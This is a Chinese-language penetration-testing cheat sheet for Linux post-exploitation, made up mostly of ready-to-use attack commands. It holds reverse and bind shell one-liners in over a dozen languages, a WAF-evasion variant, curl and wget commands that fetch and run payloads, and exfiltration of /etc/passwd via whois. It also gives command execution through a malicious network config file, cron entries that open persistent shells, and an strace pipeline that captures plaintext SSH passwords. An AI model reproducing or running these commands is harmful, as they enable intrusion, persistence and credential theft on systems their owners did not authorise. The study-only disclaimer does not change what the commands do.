Linux 安全

---

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

---

漏洞利用

• OS-Exploits

---

LOL

Living Off The Land

相关文章

• busybox docker 受限环境下回传文件

• 命令行上线小技巧

相关资源

• GTFOBins

• https://github.com/LOLBAS-Project/LOLBAS

相关工具

• sameera-madushan/Print-My-Shell - 自动化生成各种类型的反向 Shell
• lukechilds/reverse-shell - Reverse Shell as a Service
• nodauf/Girsh - nc 的替代品
• WangYihang/Platypus

  ./Platypus
  
  list # 查看连接
  jump xxxx   # 跳到目标机器
  Interact    # 交互模式

查看语言/代码支持情况

find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

查找可利用于传输文件的命令

find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
find / -name scp

bash

• tcp

  bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
  /bin/bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
  
  # 绕waf
  # ip转十进制
  /???/b??h -i >& /dev/tcp/167772161/4242 0>&1
  
  0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

• udp

  Victim:
  sh -i >& /dev/udp/10.0.0.1/4242 0>&1
  
  Listener:
  nc -u -lvp 4242

Socat

user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242

Static socat binary can be found at https://github.com/andrew-d/static-binaries

nc

• bind shell

  # 被控端
  nc -lvp 4444 -e cmd.exe     # win
  nc -lvp 4444 -e /bin/bash   # linux
  
  # 攻击端
  nc -nv 192.168.1.1 4444
  
  python -c 'import pty; pty.spawn("/bin/bash")'
  export TERM=xterm

• reverse shell

  # 被控端
  nc -nv 192.168.1.1 4444 -e /bin/bash
  
  # 攻击端
  nc -lvp 4444
  
  python -c 'import pty; pty.spawn("/bin/bash")'
  export TERM=xterm

• 文件传输

  # 收
  nc -nvlp 4444 > aaa

  # 发
  nc -nv 192.168.1.1 4444 </usr/share/aaa    # kali

ncat

# 被控端
ncat lvp 4444 -e cmd.exe --allow 192.168.1.1 --ssl

# 攻击端
ncat -v 192.168.1.1 4444 --ssl
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Netcat Traditional

nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242

Netcat OpenBsd

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

curl

curl -o test.elf https://xxx.com/shell/test.elf && chmod +x test.elf && ./test.elf

wget

wget http://1.1.1.1/shell

Other

perl

perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

python

• IPv4

  export RHOST="10.0.0.1";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

  python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

• IPv6

  python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php

php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4242).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","4242");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Golang

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

lambda Node.js

vim shell.js

(function(){
    var net=require("net"),
    cp = require("child_process"),
    sh =  cp.spawn("/bin/sh",[]);
    var client = new net.Socket();
    client.connect(8888,"1.1.1.1",function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/;
})();

node shell.js

java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.1.1.1/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

• Java Alternative 1

  String host="127.0.0.1";
  int port=4444;
  String cmd="cmd.exe";
  Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

• Java Alternative 2

  NOTE: This is more stealthy

  Thread thread = new Thread(){
      public void run(){
          // Reverse shell here
      }
  }
  thread.start();

lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"

lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

openssl

Attacker:

# 生成密钥
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# 启动监听
openssl s_server -quiet -key key.pem -cert cert.pem -port 4242

# 在目标机器上回弹
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.0.0.1:4242 > /tmp/s; rm /tmp/s

awk

awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

whois

接收端

nc -vlnp 1337 | sed "s/ //g" | base64 -d

发送端

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`

network-scripts

来自文章 : https://seclists.org/fulldisclosure/2019/Apr/24

Redhat/CentOS 发行版下通过写恶意网卡配置文件进行命令执行

sudo tee /etc/sysconfig/network-scripts/ifcfg-1337 <<-'EOF'
NAME=Network /bin/id  &lt;= Note the blank space
ONBOOT=yes
DEVICE=eth0
EOF

service network restart             # 重启网络管理触发
systemctl status network.service    # 可以看到 id 已经执行

---

启动项 & 定时任务

相关文章

• Linux Crontab定时任务反弹shell的坑

Tips

• ubuntu 不能使用 bash 反弹 shell,可以用python，perl反弹

• ubuntu 用户的定时任务在 /var/spool/cron/crontabs/ 目录下

• ubuntu 用户定时任务必须在 600 权限才能执行

• 如果做了白名单后缀,只允许 jpg ,可以传到 /etc/cron.d/ 目录下,这里文件可以任意后缀命名,上传文件名为 test.jpg 绕过对应的安全检查

一些路径

centos 的定时任务在 /var/spool/cron/root/
ubuntu 的定时任务在 /var/spool/cron/crontabs/root/

/etc/crontab
/etc/cron.d/

payload

(crontab -l;printf "* * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n")|crontab -

echo "* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" >> /etc/crontab

echo "* * * * * root echo 'success' > /tmp/crontest" >> /etc/cron.d/test123.cron

---

认证

相关文章

• How to Crack Shadow Hashes After Getting Root on a Linux System
• Linux下的密码Hash——加密方式与破解方法的技术整理

相关工具

• huntergregal/mimipenguin - 从当前 Linux 用户转储登录密码的工具
• Hashcat

口令抓取

当我们拿下 windows 机器时可以通过抓内存中的密码进行横向，但 linux 却不可能抓到内存中的密码，但是 Debian 系列下的 linux 系统可以通过监听 sshd 进程的数据抓取出明文密码，比如你拿下了一台管理员机器，上面由 xshell，你可以手动开一个监听，在开一个登录，监听的窗口上就抓出密码了

strace -xx -fp `cat /var/run/sshd.pid` 2>&1| grep --line-buffered -P 'write\(\d, "\\x00' | perl -lne '$|++; @F=/"\s*([^"]+)\s*"/g;for (@F){tr/\\x//d}; print for @F'|grep --line-buffered -oP '.{8}\K([2-7][0-9a-f])*$'|grep --line-buffered -v '^64$'|perl -pe 's/([0-9a-f]{2})/chr hex $1/gie'

实测 kali、ubuntu 都可以，centos 不行

权限提升

• 参考 权限提升 中的 linux 部分

---

无文件攻击

相关文章

• 如何使用命令行对无文件恶意软件进行取证
• Linux无文件渗透执行ELF
• In-Memory-Only ELF Execution (Without tmpfs)